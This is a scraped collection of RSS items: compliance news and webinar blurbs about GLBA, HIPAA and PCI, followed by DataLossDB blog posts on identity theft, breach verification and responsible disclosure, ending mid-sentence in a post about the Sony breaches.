http://www.compliancehome.com/rss/resources-GLBA.xml The Model EMP001 Eliminator Hard Drive and Magnetic Tape Degausser is being introduced by Security Engineered Machinery, its most recent product for degaussing hard drives. The electromagnetic-pulse degausser permanently erases data from computer hard drives, data tapes, and other magnetic media. The EMP001 is on the U.S. National Security Agency's Evaluated Products List, complies with Department of Defense requirements for destroying classified information on magnetic media, and exceeds the requirements of many national and international legislative mandates (FACTA, HIPAA, GLB, DPA, etc.) for the destruction of confidential/sensitive data.

==> Is Compliance in the Cloud Achievable

http://www.compliancehome.com/rss/resources-GLBA.xml There is no doubt that cloud computing is dominating today's IT conversation among C-level security executives. Whether it's due to the compelling cost saving possibilities in a tough economy, or because of perceived advantages in provisioning flexibility, auto-scaling, and on-demand computing, CSOs are probing the capabilities, costs and restrictions of the cloud. At the same time, security and compliance concerns are at the forefront of issues potentially holding large enterprises back from capitalizing on the benefits that cloud computing has to offer.

==> Harmonizing Controls to Reduce Your Cost of Compliance

http://www.compliancehome.com/rss/resources-GLBA.xml Mounting regulations across the globe have increased the cost and burden on organizations. The high cost is especially felt by organizations which must adhere to multiple requirements - 75 percent of organizations must comply with two or more regulations and corresponding audits and more than 40 percent must comply with three or more regulations.

==> Detecting Abnormal Technology Systems Behavior

http://www.compliancehome.com/rss/resources-GLBA.xml With hundreds and thousands of automated systems producing log data, an organization's ability to respond to

==> Federal and State Data Regulations Not to be Overlooked

http://www.compliancehome.com/rss/resources-GLBA.xml Tracking new regulations and compliance rulings from federal and state government can be dizzyingthey include FRCP, HIPAA, GLB, and more. But now more than ever, the government expects all businesses to comply, not just large corporations. Today, every company is responsible for its data and for securing its customers information, no matter how much it costs to do so. In todays litigious business world, the possibility of being dragged into a lawsuit is very real, and if that happens, you will likely need to make your information available to the process. And woe to the company that cannot comply with basic regulations, because a judge will not accept that you thought those requirements applied only to the big companies.

==> Trailing Ground: Gramm-Leach-Bliley and the Future of Banking

http://www.compliancehome.com/rss/resources-GLBA.xml The debate in Washington over financial regulation has probably puzzled most of the observers by references to the GLBA as a cause of the financial crisis. At the time of its adoption, the GLBA was hailed as a forward-looking effort to bring new flexibility and change to the banking industry. As described by John LaFalce, then the ranking Democrat on the House Financial Services Committee,

==> Payment System Product Codes to be Evaluated by PCATS

http://www.compliancehome.com/rss/resources-GLBA.xml A survey to identify the use of PCATS payment product codes within the convenience store industry has been created by the Petroleum Convenience Alliance for Technology Standards (PCATS). In addition to measuring the number of merchant fueling locations that have implemented PCATS standard payment product codes at their point of sale (POS), the survey may also help identify additional items that need to be added to the current industry code list.

==> IBM's Acquisition Of Guardium Created a Buzz in Security market

http://www.compliancehome.com/rss/resources-GLBA.xml IBM's acquisition of database activity monitoring (DAM) vendor Guardium has created a lot of buzz in the security industry. This is the first major acquisition in the database security market, the first time a large company has bet on DAM technology, and if the rumored sales price is accurate, then it suggests IBM paid a premium. And given the value this product can provide to IBM customers, it looks like a good investment.

==> A Combined Security Solution for Governance Portal

http://www.compliancehome.com/rss/resources-GLBA.xml A worldwide business consulting and internal audit firm, Protiviti Inc., has introduced the first product in its new Governance Portal for Information Technology series. The product is a security solution directed at mitigating data security risks and avoiding costly data breaches and reputation damage.

==> Analyst Webinar on Risk and Compliance Management: Learning from Leaders and Steps You Can Take

http://www.compliancehome.com/rss/resources-GLBA.xml Join Forrester Research Analyst, Chris McClean, for learning what leading companies are doing for effective risk and compliance management and step you can take today. While Risk managers in all industries are grappling with the problems of performing real-time risk measurement and mitigation, an additional complexity due stringent compliance and regulatory requirements, like SOX, FCPA, HIPAA, AML, GLBA, FERC, NERC and many more, add an additional layer of challenges for them. As a result, companies are looking to systematically identify, measure, prioritize and respond to all types of risk in the business, while ensuring compliance to federal and state regulations.

==> PCI - It's Not Quite Everywhere It Should Be

http://www.compliancehome.com/rss/resources-GLBA.xml Join to learn about critical technologies that can assist your PCI compliance efforts. We will discuss how to: Protect critical data from leaving your enterprise through malicious hackers and/or employee mistakes Go beyond intrusion detection and prevention to a positive, proactive, security model that protects against new email and web-borne attacks, Safely enable remote employees, partners, contractors and other third parties to authenticate and access pertinent information, Implement security measures that ensure simultaneous compliance with PCI, SOX, GLBA, HIPAA and other privacy and data protection regulations.

==> Satellite Technology Used by Glacier Bay National Park Rangers to Help Tousled Whales

http://www.compliancehome.com/rss/resources-GLBA.xml Rangers in Glacier Bay National Park respond not only to human visitors in trouble, but also to marine life that need help. A recent case of a humpback whale that became entangled in a polyester line demonstrates not only the quick response of park rangers, but also how satellite technology can play a role in saving whales.

==> 'Managing the Cloud: Are You Comfortable with Where Your Data Sleeps at Night?'

http://www.compliancehome.com/rss/resources-GLBA.xml Why is cloud computing relevant today from an economic, business and technology standpoint? What are some potential benefits and pitfalls of moving to the cloud? What should you look for in a cloud computing provider to ensure the security of your data and applications? In an October 8 interview from Times Square, Sam Gross, vice president, Global Information Technology Outsourcing Solutions, Unisys Corporation, will answer these questions and more. Sam will talk about how the economy is accelerating a tectonic shift in IT and how it supports the business. bleep also discuss how to transform a traditional data center that is inflexible less flexible and costly to a cloud computing environment that is secure, virtualized and automated requiring less investment.

==> Sipera Secure Live Communications Mobility System Made Available by era Systems

http://www.compliancehome.com/rss/resources-GLBA.xml Smartphone VoIP and unified communications, or UC, business ready are offered by Sipera SLiC. This latest offering delivers enterprise-class communications privacy and security for VoIP and UC on smartphones. Additionally, the companys system enables smartphone VoIP to include smart-card card authentication for accessing enterprise resources. Company officials said that this provides unparalleled access control and communications privacy.

==> The Wonderful Triangle of IT Security

http://www.compliancehome.com/rss/resources-GLBA.xml The myths of the CIA triad Have you ever considered taking a role as the most senior person for information security working at a large corporation? Then you must be prepared to understand the key principles of information security-and how they really apply to life and business.

==> Sensitive Data to be Sealed by Solid Wireless Security Policies (Part 3)

http://www.compliancehome.com/rss/resources-GLBA.xml With smartphones gaining traction in the consumer world, its easy to forget that handsets are simply mini computers that could contain sensitive data about business contacts and inter-office electronic communication. In addition to putting in place a procurement policy that includes checks and balances for who gets what type of wireless device and plan, as well as a usage policy to make sure employees arent overusing mobile services for personal use, implementing a solid security policy is also essential, said Pankaj PJ Gupta, founder and CEO of Amtel (News - Alert), a company that helps enterprises to rein in wireless management expenses and improve productivity.

==> Updated AMU Kit Offered to FaceTime's Unified Security Gateway 3.0

http://www.compliancehome.com/rss/resources-GLBA.xml A purveyor of applications designed to promote the secure use of Web 2.0 and unified communications in the commercial segment, FaceTime Communication, announced the commercial launch of its Augment, Migrate and Update, or AMU kit. The kit is devised for enterprises who are at the brink of expensive upgrades needed to maintain compliance with enterprise security and control standards, which are essential to manage the changing face of the Internet.

==> Former Chairman of the Federal Reserve Wants to Bring Back 1933 Glass-Steagall Act

http://www.compliancehome.com/rss/resources-GLBA.xml The former Chairman of the Federal Reserve [1979-1987], that Paul Volker, has advised the Obama Administration to bring back the 1933 Glass-Steagall Act [SGA]. The Glass-Steagall Act was repealed in 1999 and replaced with the Gramm-Leach-Bliley Act [GLBA]. The GLBA removed restrictions on commercial banks and investment banks allowing them gross latitude in activities and services. (Reem Heakel, 2009)

==> SOX, GLBA and HIPAA: Multiple Regulations, One Compliance Solution - Vendor Webcast

http://www.compliancehome.com/rss/resources-GLBA.xml SOX, GLBA and HIPAA share a common regulatory compliance thread - the need to use automation to ensure continuous compliance with required IT controls. View this webcast for an overview of each regulation. Also, gain an understanding of the capabilities an organization must have in place to address these requirements.

==> Data Security should be ensured by the Strategy

http://www.compliancehome.com/rss/resources-GLBA.xml Over the past few years, with the rise in incidents of identity theft many organizations are rightfully concerned about keeping their customers' data private. While the financial service industry has been regulated since the late '90s by the federal government, other companies would be wise to follow their lead. For some years now, financial service companies have had to comply with the provisions of the oft-maligned Gramm Leach Bliley Act. Among other things, GLBA calls for a process that begins with an assessment of an organization's information systems, development of a security strategy, implementation of the strategy and, finally, ongoing monitoring.

==> FDA's Growing Role Regulating Health 2.0, Health IT

http://www.compliancehome.com/rss/resources-GLBA.xml The federal regulation is part of the deal is very well known by many who are involved in the world of health IT. Issues of health information privacy have been subject to an array of federal and state laws for decades. HIPAA, the Federal Privacy Act, laws governing Medicaid, Medicare, the Veterans Health Administration, funds used for the treatment of mental illness, sexually transmitted infections and on and on all have privacy provisions. There is a similar regulatory scheme for data security, again including HIPAA, the Gramm-Leach-Bliley Act and other laws.

==> SOX, GLBA and HIPAA: Multiple Regulations, One Compliance Solution

http://www.compliancehome.com/rss/resources-GLBA.xml SOX, GLBA and HIPAA share a common regulatory compliance thread - the need to use automation to ensure continuous compliance with required IT controls. These regulations require technical safeguards to protect or guarantee the veracity of critical information. With SOX, its for public companies to guarantee accurate financial accounting. GLBA protects personal financial information of an organizations customers. And HIPAA protects and guarantees the privacy of an individuals personal health information (PHI). What all three have in common is the requirement for specific IT controls. Learn more about these regulations and how to automate manual processes with an integrated change auditing and configuration control solution.

==> Severance of Duties in Virtualized Environments

http://www.compliancehome.com/rss/resources-GLBA.xml With Virtualization we have moved a step closer to the world of Star Trek. Think back to episodes of The Next Generation where Geordi was able to control the functions of the entire ship through a single touch-screen interface. He was able to reconfigure electrical, mechanical and propulsion systems without needing anyone else or additional authorization. The only thing to prevent him from doing something risky or damaging was the computer system itself.

==> SOX, GLBA and HIPAA: Multiple Regulations, One Compliance Solution

http://www.compliancehome.com/rss/resources-GLBA.xml SOX, GLBA and HIPAA share a common regulatory compliance thread - the need to use automation to ensure continuous compliance with required IT controls. These regulations require technical safeguards to protect or guarantee the veracity of critical information. With SOX, its for public companies to guarantee accurate financial accounting. GLBA protects personal financial information of an organizations customers. And HIPAA protects and guarantees the privacy of an individuals personal health information (PHI). What all three have in common is the requirement for specific IT controls. Learn more about these regulations and how to automate manual processes with an integrated change auditing and configuration control solution.

==> Availability of OfficeScreen Complete Announced by ANXeBusiness Corp.

http://www.compliancehome.com/rss/resources-GLBA.xml A leading provider of networking and security managed services, ANXeBusiness Corp., announced the availability of OfficeScreen Complete, a fully managed security solution providing comprehensive protection from web-based threats, advanced remote access capabilities, and productivity enhancement tools. Built upon two powerful security technologies - ANX OfficeScreen and ANX PositivePro - OfficeScreen Complete combines an award-winning managed firewall, site-to-site VPN, URL filtering, and remote access technology into one hosted solution. Additionally, when supporting five or more users, OfficeScreen Complete can also include wireless access point security, traffic shaping, and Internet failover support.

==> Bank compliance laws need to be streamlined to really help consumers

http://www.compliancehome.com/rss/resources-GLBA.xml In todays scenario is gets must for the banks to devote an huge amount of time and resources, at great expense, to keeping up with the never-ending cascade of new laws and regulations and keeping in compliance with the myriad existing ones. Before Congress enacts legislation implementing the part of the administration's regulatory reform proposal that calls for the establishment of a new Consumer Financial Protection Agency, it should take a close look at the compliance burdens already heaped upon banks.

==> Vital Information Security and Compliance Activities for 2010

http://www.compliancehome.com/rss/resources-GLBA.xml It has always been a challenge for businesses and organizations of all sizes to manage the security of critical information. Even companies that invest in the latest security infrastructure and tools soon discover that these technology-based solutions are short-lived.

==> Data Loss Prevention not a solution

http://www.compliancehome.com/rss/resources-GLBA.xml One of the powerful tools that many organizations are using to prevent the unauthorized copying or transmission of confidential or personal data is Data Loss Prevention (DLP). Organizations spend a tremendous amount of money and time to set up firewalls and intrusion detection solutions to prevent attackers from the outside from gaining access to internal assets. However, what about the internal threat? A Web page, an e-mail with a client list, or personal data copied to a USB drive are all examples of data that can leave an organization unmonitored and undetected.

==> PCI - It's Not Quite Everywhere It Should Be

http://www.compliancehome.com/rss/resources-GLBA.xml Join this webinar to learn about critical technologies that can assist your PCI compliance efforts. We will discuss how to: Protect critical data from leaving your enterprise through malicious hackers and/or employee mistakes Go beyond intrusion detection and prevention to a positive, proactive, security model that protects against new email and web-borne attacks Safely enable remote employees, partners, contractors and other third parties to authenticate and access pertinent information Implement security measures that ensure simultaneous compliance with PCI, SOX, GLBA, HIPAA and other privacy and data protection regulations

==> Real-Life Log Management Challenges for Financial Institutions

http://www.compliancehome.com/rss/resources-GLBA.xml With hundreds and thousands of automated systems producing log data, an organization's ability to respond to

==> Email Security and Archiving - Clearer in the Cloud

http://www.compliancehome.com/rss/resources-GLBA.xml The time is NOW for businesses and organizations of all sizes to implement cloud computing solutions for email security and archiving. Cloud computing solutions are more effective than traditional, on-premise solutions and at a fraction of the cost and IT resource requirements. Listen to this live TechRepublic Webcast, featuring moderator Steve Kovsky and featuring special guests Michael Osterman, President of Osterman Research and Adam Swidler with Google. They present findings, regarding the latest research comparing cloud solutions with on-premise solutions.

==> PCI - It's Not Quite Everywhere It Should Be

http://www.compliancehome.com/rss/resources-GLBA.xml Learn about critical technologies that can assist your PCI compliance efforts. We will discuss how to: Protect critical data from leaving your enterprise through malicious hackers and/or employee mistakes Go beyond intrusion detection and prevention to a positive, proactive, security model that protects against new email and web-borne attacks Safely enable remote employees, partners, contractors and other third parties to authenticate and access pertinent information Implement security measures that ensure simultaneous compliance with PCI, SOX, GLBA, HIPAA and other privacy and data protection regulations

==> Generating grounds for identity theft

http://www.compliancehome.com/rss/resources-GLBA.xml The federal GLBA, HIPAA, FACTA and its Red Flags and Disposal Rules, state data Breach Notification Laws and hundreds of other federal and state laws and industry regulations like PCI-DSS are intended to protect the privacy and security of consumers personally identifiable and financial information entrusted to businesses and other organizations. Many such regulations aim to prevent identity theft and privacy violations.

==> The Price of Not Complying With GLBA

http://www.compliancehome.com/rss/resources-GLBA.xml The Gramm-Leach-Bliley Act (GLBA) requires financial institutions to create and maintain an information security program to protect customer information. This webcast highlights GLBA and Technology safeguards, the price of not complying, how to identify technology compliance areas, compliance policy and process - who implements and how, and Tripwire GLBA Product/Service offerings.

==> SAS 70 Certification Completed by CRG West

http://www.compliancehome.com/rss/resources-GLBA.xml A developer, manager and operator of data centers, CRG West, has completed SAS (News - Alert) 70 Type II certification at the companys Boston and Chicago data centers. The company believes the completion of this certification process in Boston and Chicago has made the outsourced data center selection process more efficient for prospective customers from all industries.

==> CIO Strategies for Retention and Deletion of Email and Electronic Information

http://www.compliancehome.com/rss/resources-GLBA.xml Over the past two years, major changes to the Federal Rules of Civil Procedure (FRCP) and the increase in state and federal compliance regulations have created new challenges for companies as they struggle to manage email retention and deletion policies. To successfully maintain compliance and protect their business in the event of litigation, companies must understand these changes. Implementing new strategies for email will enable organizations to effectively set and manage email retention and deletion policies, as well as provide robust search and e-Discovery capabilities to respond rapidly to litigation.

==> Improve Performance, Reduce Data Growth Costs - Archiving ERP Applications

http://www.compliancehome.com/rss/resources-GLBA.xml View this Webcast to find out from the experts how effective application archiving can help you effectively manage your production database, control data growth, and ultimately improve your bottom line.

==> Using Email Encryption to Enforce Security Policies for PCI, GLBA & HIPAA Compliance

http://www.compliancehome.com/rss/resources-GLBA.xml Ensuring your organization complies with today's increasingly complex regulations and industry mandates around email and data security can be both a legal and technical mine field.First you need to understand what data should be protected. Then you need to determine who in your organization has access to that data and is sending it to people outside of the organization. You also need to invest in technology to enforce your compliance policies. It can be intimidating for any IT department. Hearing how your peers have tackled these challenges can help you plan your approach to finding a solution. Watch the webinar,

==> Email is Critical...and Out of Control!

http://www.compliancehome.com/rss/resources-GLBA.xml More than 75% of the average company's intellectual property is contained in email messages and their attachments. As a result, email has quickly become the file server of choice for most of us - and a headache for compliance managers.The value of unified information access to live and archived email via desktop or mobile device is becoming increasingly important for today's businesses - from end users to the board room, where compliance is an ongoing pain point.

==> The Top 10 Benefits of SaaS-enabled Email Management

http://www.compliancehome.com/rss/resources-GLBA.xml Email is indisputably the most important business application for most organizations. Yet, managing it has always been a no-win proposition. Add the pressure of fewer people and resources as well as shrinking budgets these days, and it seems that the pain of managing email can only get worse. But don't despair, there's a new breed of managed SaaS-enabled email services that are modular, reliable, and secure for virtually any type of business.

==> Improve Performance, Reduce Data Growth Costs - Archiving ERP Applications

http://www.compliancehome.com/rss/resources-GLBA.xml View this Webcast to find out from the experts how effective application archiving can help you effectively manage your production database, control data growth, and ultimately improve your bottom line.

==> Nothing is certain but death, taxes and identity theft.

http://datalossdb.org/incident_highlights.rss As we are well into tax season, there has been a trend of articles in the news involving identity theft and tax fraud. Individuals are stealing information from various sources, which are not only businesses, but also straight out of mailboxes in order to commit identity theft and file false tax returns. Some of these criminals have been reported to net as much as $11 million with their schemes before being caught. 641,690 incidents had been identified by the IRS as of September 30, 2012. Each of these incidents are a concern. However, all are not reported in DatalossDB as we require data loss incidents to have a steward organization. Therefore, we submit only to our database the schemes where personal data is stolen from an organization or business, but discard those where the data is stolen out of mailboxes as they dont fit our requirements. Here are some snippets of the latest cases we have seen in the news; these cases include both ones DatalossDB would and would not catalog. There seems to be a trend in state employees and tax preparers stealing information to file false tax returns themselves or to sell the personal information to others. In one case in Alabama, a state employee obtained identification information from a state database from October 2009 until April 2012. That is two and a half years in which she went undetected while working with co-conspirators to file over 1,000 false tax returns and receiving fraudulent returns totaling $1.7 million. In Los Angeles County, the Department of Public Social Services had an employee, who as a receptionist had access to the systems to input data and assistance requests. She took screenshots of 132 applicants PII (Personally Identifiable Information), and with the help of her husband and friends filed 65 tax returns in 2011 netting a total of $357,704.90 in fraudulent claims. In Silver Spring, MD, two brothers running a tax service together stole identities from Puerto Rican residents to submit fraudulent claims through their business. They filed 13 false returns totalling $43,264. Another tax preparer used information of previous clients and deceased persons in order to defraud the IRS and taxpayers for over $200,000 from 2003 to 2008. The largest case we've seen, which is currently awaiting sentencing, took place in Fort Lauderdale and involved the filing of around 2,000 false tax returns from October 2010 until June 2012. This particular identity theft tax fraud scheme pulled in over $11 million. To many, this might seem like a great way to make money. Here are some of the punishments that have or will befall these criminals. If convicted, the Alabama state employee is facing 20 years for each wire fraud count, 10 years for each computer fraud count, 10 years for conspiracy to file false claims, 2 years for aggravated identity thefts, fines, and mandatory restitution. The tax preparer, who used client and deceased persons information, was sentenced to 60 months in prison and paying full restitution amounting in excess of $200,000. As for the case where the scheme pulled in around $11 million, one of the women involved is looking at possibly being sentenced to 351 years. That is around 6 lifetimes of prison! The IRS is taking action in response to the increase in tax related identity theft over the last few years. They have activated new identity theft filters, and are working with over 130 financial institutions to help identify identity theft schemes. The IRS has also trained over 35,000 people, who have direct contact with taxpayers, in ways to help identify red flags associated with identity theft, and they have doubled the employees in their tax related identity theft department. Multiple resources including the IRS are recommending a few things to help keep your identity safer. Make sure that you do not carry your Social Security card around in your wallet or purse; if you do, take it out and place it somewhere secure. In fact, it is a good idea to take any documents containing personal information and secure them in your home. Many businesses ask for your Social Security number, even if it is not mandatory information. It is best to not automatically provide it every time you are asked. Never give out your personal information over the phone or email; the IRS does not contact taxpayers either way to acquire information. Monitoring your credit report on a regular basis can help to identify identity theft, hopefully before the loss becomes severe.

==> Knock, knock. Who's there? No one.

http://datalossdb.org/incident_highlights.rss As we mentioned in our last post, trying to contact and confirm organizations that have reportedly been breached can be time-consuming and frustrating. When that organization is a hospital and we cannot reach anyone or get a response, it's especially concerning. Yesterday, I tried to contact [Redacted] Hospital. I went to their site for contact info, but they had no phone directory or email directory by department or office. So I called their main number and asked for IT. I was sent to voicemail. I hung up, called back, and asked the operator to stay on the line until I got through to a person in IT or the Privacy Compliance Officer. Eventually, I heard a male voice, who told me that he was the "service desk." The "service desk" was not IT. I subsequently learned that they are an outsourced IT partner. I explained that the hospital had apparently suffered a hack via SQL injection and I could email him a link to the data so that IT could investigate and take action to secure the server better. I gave him my name, email address, and phone number, and told him that I was with the Open Security Foundation. He told me didn't have an email address for me to email him the link, but that he would open a ticket. He had no email address to give me? Seriously? On the one hand, not accepting an emailed link from a stranger makes good security sense, but on the other hand, how could I send them data and details without an email address? I usually paste some dumped data into the body of the email with the link to the full paste. So now, not only could I not directly reach the responsible parties, I could not even send them any data to pursue. The service desk employee opened a ticket and sent me a copy of it. That was almost 24 hours ago. The two individuals he directed the ticket to were the hospital's System Administrator and Technical Analyst, neither of whom have contacted me by email or phone, even though my contact details were in the support ticket. In this case, the data were dumped on the Internet at the beginning of December 2012, so maybe they know already, but since the data are still live and in any event, they have no idea what data I called about, maybe they don't know. The data do not appear to be patient data, but they are personally identifiable information. And if those data were vulnerable, what other data might still be vulnerable? Another staff member from OSF also tried to reach them last night - through the hospital's on-site contact form. That form doesn't have a pull-down menu to direct the message to particular subjects or departments. It shouldn't be so difficult to contact the responsible party when there's been a breach. So here are some "best practices" recommendations for HIPAA-covered entities to add to their checklists: 1. Provide a dedicated phone number and email address to report privacy or security breaches and prominently post those contact details on the home page of your web site. 2. Ensure that the phone number and email address are monitored 24/7/365. 3. Establish a written policy that all such contacts or messages are to be acknowledged within 1 hour. 4. Follow up and let the individual who reported the problem know what steps you have taken. 5. If you use a contact form on your web site, have a pull-down menu for subjects, and have one of them be "Privacy or Security Concern." Every hospital tells patients that they take the privacy and security of their information seriously. I wouldn't believe them if they don't respond to security alerts and make people jump through hoops just to try to inform them that they may have had a breach involving personal information. And I certainly wouldn't believe any hospital that doesn't even return a phone call when you have left them a message that they may have a security problem with their public-facing server. Responsible hospitals should facilitate reporting privacy or data security concerns. So what has your organization done to facilitate reporting of breaches? /Dissent

==> Fool us once, shame on you. Fool us twice, we implement policies!

http://datalossdb.org/incident_highlights.rss It had all the makings of a sexy data breach story. An individual with the Twitter nick of @TibitXimer claimed to have exploited a vulnerability on Verizons server and dumped about 300,000 records out of an estimated 3,000,000 customer records allegedly acquired. ZDNet trumpeted the headline, Exclusive: Hacker nabs 3m Verizon customer records. They reported: "A hacker has posted around 300,000 database entries of Verizon customers to the Web, after exploiting a vulnerability in the cellular giant's network. The hacker, going by the name @TibitXimer on Twitter, told ZDNet earlier this evening that the hack was carried out earlier this year on July 12, which allowed him to gain root access to the server holding the customer data. Tibit gained access to a server with little difficulty after working with another hacker to identify the security flaw." The problem is that although none of it was true, @TibitXimers claims and ZDNets repetition of the claims were repeated all over the Internet. One day later, @TibitXimer was gone from Twitter and a more accurate version of the story started to emerge. In statements to other media outlets such as DataBreaches.net, The Next Web, and Forbes, Verizon spokesperson Alberto Canal explained that Verizons systems had not been breached at all, there was no vulnerability exploited, no root access gained, and that the data dumped were old data from an incident a few months ago. To add insult to the reputation harm that Verizon could have suffered, the incident wasn't even Verizons incident. It turned out that a third party marketing firm that Canal did not name had accidentally leaked a sales lead list and the list had simply been copied and posted at the beginning of August. Most of the names on the list were not even Verizon customers, according to Canal. The same data were re-posted this week and claimed as a new hack. Not such a sexy story anymore, right? And ZDNet is certainly not the only media source to believe a hackers claims that were subsequently determined to be totally untrue. We've been fooled, too, at times, as has Lee Johnstone, who recently had to correct a report on Cyber War News that a hacker named Hannibal had leaked 1,000,000 Facebook account details in retaliation for #OpIsrael. Over the past year, the problem of false claims has reached almost epidemic proportions, which is why, over the past few months, DataLossDB.org started implementing policies requiring us to obtain or at least make a good faith effort to obtain when possible a statement from an allegedly breached entity either confirming, denying, or clarifying and correcting a hackers claims of a breach - *before* we decide whether to add a report to the database. Sometimes, as in this case, it is relatively easy to reach a media contact and get a response. In other cases, particularly with small entities involved in claimed hacks overseas, it is not so easy, and we may send several e-mails that go unanswered before we try to decide whether to include a claimed breach or not. If you login and read individual entries, you may even see a Curators Note in the Comments section indicating that we tried and failed to reach anyone by e-mail to confirm the report. Deciding whether to include a report when we cannot reach anyone is headache-inducing, to say the least, as we realize that with this less than perfect system, entities might suffer reputation harm through no fault of their own. We have therefore also implemented the ability to fully delete entries from the database should we later learn that a claim was totally false. Another policy we recently implemented involves putting (DISPUTED) in the summary line for an incident if there is a real dispute as to whether a breach occurred or not. There may be times when an entity insists they have not been breached but we find the evidence in a data dump to be compelling and decide to include the report. This was the case, for example, in the reported hack of MilitarySingles.com, where they denied it to DataBreaches.net and others, but analysis of the data dump and information still available on their site led us to the decision to include the report. At other times, a reported breach may be part of litigation and where the defendant denies the claims, we may decide to include the report but note it as DISPUTED. Trying to confirm the numerous claimed hacks that appear on Pastebin or other sites on a daily basis is a time-consuming process that slows us down in providing timely reports and has put even more pressure on our resources that are already constrained. However, we believe that it needs to be done to ensure data quality. And so, as 2012 draws to a close, we have already added over 1,400 incidents (and that number does not include the Fringe incidents) for the year, but there are hundreds more still to process. Whatever number you see on the Stats page for December 31st will likely be significantly under our real total for the year until we can catch up. On that note, I wish you all a Happy and Healthy 2013. And lets hope that next year, things slow down for us! /Dissent

==> Is A Data Breach A Life Or Death Situation?

http://datalossdb.org/incident_highlights.rss Most people would agree that security is important; however, many would have a hard time saying that a data breach could be a life or death situation. Sadly, in the past few weeks there have been two cases that may qualify for that characterization in the news. The first case is the data breach at King Edward VII Hospital on December 4, 2012. Two Australian radio show hosts prank called the hospital in a joking attempt to get information on the condition of the Duchess of Cambridge. To their surprise the nurse, who answered the phone, fell for the hoax and provided them with information on the Duchess's condition and care. Last Friday, Jacintha Saldanha, the 46 year old nurse who provided the information, committed suicide just two days after news of the breach was released. The second case involves a data breach that occurred September 28, 2012 at the University of Georgia. A former student gained unauthorized access to a server containing 8,500 former and current employees' names, Social Security numbers, and other sensitive information. Still in the midst of investigation, police announced on Tuesday that Charles Stapler Stell, the 26 year old behind the data breach, passed away with no indication of foul play and most likely the result of suicide. In these two cases, the data breaches and their consequences appeared to have pushed these individuals into a life or death decision. As the importance of privacy and security breaches increases, we have now seen there are potential ramifications to the people involved, more than just notification and credit monitoring. As breaches unfortunately become more commonplace, organizations impacted should ensure that they not only have a response plan for dealing with the incident, but also how to constructively handle any employees at fault. While discipline from HR may be on the agenda, organizations need to ensure the wellbeing of their employees as they process their actions. References: http://www.bizjournals.com/atlanta/news/2012/12/11/uga-dead-former-student-responsible.html http://www.telegraph.co.uk/news/9730305/Statement-from-the-King-Edward-VIIs-Hospital-on-the-death-of-nurse-Jacintha-Saldanha.html

==> Behind the scenes of doing the right thing

http://datalossdb.org/incident_highlights.rss From time to time, the Open Security Foundation is contacted about security vulnerabilities and data breaches that have yet to be made public. We always strive to handle each report in the most appropriate way possible and wanted to share with you an example from last year. In March of 2011, we had a breach anonymously submitted to DataLossDB without any further way to contact the submitter, but enough information for us to work on verifying and relaying the issue to the affected company. From the initial look of things, it appeared that job applicants' names, addresses, phone numbers, email addresses, and resumes were accessible and even editable on the Computer Sciences Corp (CSC) website without requiring a login. You could browse to their resume website and increment the ResumeID=x field in the URL making it trivial to enumerate and access approximately 300 applicants personal information. We contacted CSC as soon as the incident was submitted to see if they would speak to us or at least provide a response. At first it appeared that they ignored our emails and we were getting a bit concerned as several days went by without a response. However, once we escalated to a phone call, we were then able to discuss the issue with the proper contacts and the vulnerability was fixed within 48 hours. We also spoke with their lawyer and they stated that they would notify those affected and get back to us with a statement. Here is the statement from CSC: ---------------------- Original Message ---------------------- Last month, CSC was contacted by Open Security Foundation ("OSF") who had received an anonymous tip that an Internet-accessible Web site CSC had set up for a recruiting effort had security issues. Upon internal investigation, it was determined that the site created in 2006 was unintentionally architected in such a way as to allow for url manipulation once a person created a profile for themselves, giving them the ability to see other person's resume information. CSC has no evidence that anyone other than the original anonymous tipster and those associated with OSF actually had access to resume information. This site was not properly de-provisioned and remained accessible until 2011 (although the last resume received was in September 2010). The contents, however, were not indexed or searchable by Google. There were approximately 300 profiles created with varying amounts of personal information provided. Although CSC did not ask for or require birth dates or Social Security Numbers, eight people provided either one or both. One person provided the last four digits of a SSN. CSC will provide formal notification as required by state law. In addition, where there is no state requirement, CSC will nonetheless send letters to inform everyone about the vulnerability.
Due to our delay, we have just now pushed this incident live and wanted to thank the anonymous submitter for providing us the information so we could responsibly report it and to CSC for responding to the breach appropriately. To be clear, after we spoke with CSC on the phone and were able to get connected to the right people they responded promptly, did a thorough investigation, and then to our knowledge notified everyone. Our delay in posting this update and pushing the incident live in no way is an indication one way or the other about CSC. In fact, it just highlights the continued challenges for the Open Security Foundation to keep up with the massive amount of breaches that continue to occur every day. In addition, we thought we would post this particular example to share some of the work that happens behind the scenes at OSF, that many people would never know exists. Coordinating with organization such as this can take a great deal of time and patience on both sides. Whenever possible and practical we do go out of our way to alert entities to breaches, but at other times we unfortunately just have to post the breach. We would love to contact all entities to confirm they are aware of the incident and offer assistance but this is not possible. For example, while we may from time to time we dont typically contact organizations for breaches when the data is posted publicly such as when information is dumped to Pastebin or other paste sites. Unfortunately, we do not have sufficient staff to always do that and some sites do not make it easy to contact them. We would love to be able to do more with the project, but unfortunately just have not been able to get the support or volunteers required. Moving forward, we will be making changes with the project to help ensure our future. This will begin with a new partnership with Risk Based Security, which will be able to bring more resources to better support the project and continue our research.

==> Sony had HOW many breaches?

http://datalossdb.org/incident_highlights.rss We thought keeping track of entities involved in the Epsilon breach was tough, but the recent spate of attacks on Sony networks has us working overtime trying to update the database. Thankfully, Jericho provided yeoman service and compiled a hyperlinked chronology of recent developments. The Sony breaches have generated a lot of discussion. Some of it has centered on Sony's shocking failure to encrypt passwords and it being all-too-vulnerable to SQLi compromises (if those posting the data publicly are accurate as to how they compromised certain databases). Sony undoubtedly has a lot of explaining to do if it hopes to have future assertions of industry-standard security taken seriously. To date, the two largest incidents affected over 100 million records. But were the PSN and Sony Online Entertainment (SOE) attacks two separate incidents or were they really one breach? Should DataLossDB.org have recorded one breach with over 100 million affected, or two incidents involving 77 million and 24.6 million, respectively? Or should we just treat the last 45 days' incidents as one #EPIC #FAIL and one big incident? In light of our mission to track unique breaches, the question is not trivial. When news of the second incident broke, the first thought was to update the PSN entry and add another 24.6 million to that counter. But as more details emerged, it seemed clear that we should treat it as a separate incident. The attack had occurred on different days than the PSN attack, the data compromised were on different networks, it seems quite likely the different networks had different security measures involved (Sony later testified that databases with credit card data were treated with higher security), we did not know if the same individuals were involved in both attacks, and the company itself was reporting it as a second incident previously unknown to them and not as an update to the other breach. Our impression that these were two unique incidents was subsequently supported by the reports made to the New Hampshire Attorney General's Office for each incident (here and here). Despite what we thought was an accurate way to track these breaches, one commenter to DataLossDB.org questioned our decision to treat the reports as two unique incidents. A researcher with Javelin Strategy commented that treating this as two 